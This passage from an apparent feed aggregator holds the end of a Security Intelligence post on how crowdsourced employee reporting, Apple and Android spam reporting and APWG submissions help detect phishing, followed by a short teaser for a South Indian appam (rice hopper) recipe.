β€œSuch crowdsourcing allows fast detection of new phishing campaigns, the operational load for the organization is acceptable and the employees remain active over long periods of time,” the report stated.

When a β€œReport Phishing” button was added to an email platform, the study found that users would report suspicious emails within five to 30 minutes of receipt. Users were fairly accurate in detecting a potentially dangerous email: they were right 68% of the time for a phishing attack and 79% when spam was included.

Even better, there appears to be no reporting fatigue for users and little burden to organizations adopting a crowdsourcing system. The quick response from the users means that security teams can address the threat quickly.

The Bigger Picture of Crowdsourcing Security

Crowdsourcing goes beyond internal security. The ultimate goal is to leverage information from individual users to detect and prevent phishing attacks on millions of users within a network.

For example, with the release of iOS 16, users have the ability to report spam sent through iMessage directly to Apple. This won’t prevent the sender from sending messages, but the user’s device will block further messages once reported. It’s an option that has been available on Android devices for a while.

MSSPs and security vendors are using tools and applications that share phishing information across their network of clients. When one user or company reports a suspected phishing message through the tool, this information can benefit investigations of similar attacks against other organizations and stop potential threats.

The federal government also encourages crowdsourcing phishing information. On the Federal Trade Commission’s phishing information page, users can take a quiz to test their knowledge of phishing attacks and are urged to forward phishing emails to the Anti-Phishing Working Group (APWG) at reportphishing@apwg.org. APWG analyzes this data to build phishing activity trend reports. Organizations can see the type of impacts phishing attacks have β€” what industries are seeing the most attacks, how the attacks are happening and the type of malware (mostly ransomware) affecting networks β€” and then use the information to offer the best security plan for their needs.

Crowdsourcing Security Helps Keep Your Organization Safe

Sharing data surrounding phishing attacks and other types of malicious messaging allows organizations to develop more effective cybersecurity defense systems and increases overall security awareness. As the ETH Zurich study showed, traditional methods of phishing awareness training have been found wanting. Actively engaging employees to not only know how to spot phishing attacks but also to properly report them will increase their own sense of ownership in the organization’s security posture. Once more invested, they are more likely to use better security practices more consistently. In the long run, this helps organizations reduce costs related to cyber risks.

When done right, crowdsourcing security is an effective cybersecurity tool, especially for phishing and malicious messaging attacks.

The post Why Crowdsourced Security is Devastating to Threat Actors appeared first on Security Intelligence.

Appams (Rice Hoppers)

By: Fouzia
10 November 2019 at 14:09

β€œAppam” as it is called in Tamil is a breakfast delicacy which is very popular in South India and Sri Lanka. Hopper is the anglicized version of the name. The β€œAppam”is basically a fermented bowl shaped rice flour pancake with a soft, spongy, fluffy centre and a thin crispy, lace like network of fine bubbles...

Read More

The post Appams (Rice Hoppers) appeared first on Mamas Secret Recipes.

❌
❌